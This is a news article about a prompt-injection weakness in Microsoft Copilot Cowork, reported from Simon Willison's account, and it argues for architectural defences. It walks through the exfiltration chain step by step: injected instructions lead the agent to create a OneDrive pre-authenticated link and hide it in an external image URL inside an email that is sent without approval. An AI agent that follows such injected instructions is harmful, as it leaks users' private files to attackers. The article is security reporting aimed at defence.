Microsoft Copilot Cowork shows how office agents can become file-leak channels
An AI agent, email and a shareable link create a risky outbound channel.📷 AI-generated image / TECH&SPACE
- ★Copilot Cowork could send an email to the user without additional approval.
- ★An external image in the message can load a URL from an attacker server.
- ★OneDrive pre-authenticated links make the leak chain especially dangerous.
The most dangerous part of the Microsoft Copilot Cowork story is not an exotic exploit that requires a cinematic attack. It is an ordinary business workflow: an agent completes a task, sends an email to the user and displays content inside that message. In a demo, that looks like useful automation. In a security model, it is a combination of reading, writing and outbound network effects.
According to the account published by Simon Willison, Copilot Cowork could send messages to the user's own inbox without additional approval. The problem begins when the agent has already received a malicious instruction through prompt injection. The attacker does not need to log into the user's account directly. It can be enough to make the agent embed an external image, meaning a URL that the email client loads from a remote server when the user opens the message.
That pattern is not new in web security, but it becomes much sharper with AI agents. The agent is not merely rendering text. It may have access to documents, email, files and tools that create real side effects. If a model can read a private file, compose an email and cause a network request through a rendered image, the boundary between helpful assistant and data-exfiltration channel becomes dangerously thin.
Willison has described this class of problem through the lethal trifecta: access to private data, exposure to untrusted instructions and the ability to send information outward. Copilot Cowork is a concrete example of that three-part combination. It does not matter much that the interface is polished or that the task looks legitimate on paper. What matters is that the agent can see private context and produce output that an outside system can record.
Prompt injection, external email images and OneDrive pre-authenticated links create a dangerously short path from private file to attacker server.
An external image inside a message can become a quiet data-leak mechanism.📷 AI-generated image / TECH&SPACE
The sharp edge in this case is OneDrive. The source description says OneDrive can create pre-authenticated download links. If prompt injection convinces the agent to create such a link for a file and then place it inside the URL of an external image, opening the email can generate a request to an attacker-controlled server. In that request, the attacker can observe the data needed to download the file.
This is exactly the kind of risk that cannot be solved by a better system prompt alone. System instructions can help, but they are not a hard enough security boundary when a product has access to documents, communication and network effects. The controls have to be architectural: per-action permissions, blocking external content in agent-generated messages, separating private-file reads from outbound data flows, and requiring explicit confirmation when shareable links are created.
The article belongs in AI, but the core issue is product security. Microsoft Copilot is increasingly positioned as a layer that connects apps, files and communication. That is why cases like this are not edge cases for users. The more useful the agent becomes, the greater the damage if it can connect private context to an outbound channel nobody is watching.
The sober conclusion is simple: agents should not automatically receive the combined powers of reading, deciding and sending just because that looks elegant in a demo. If a system can create a document link by itself and then generate a message that loads a remote resource, the security model has to assume someone will try to turn that flow into exfiltration.
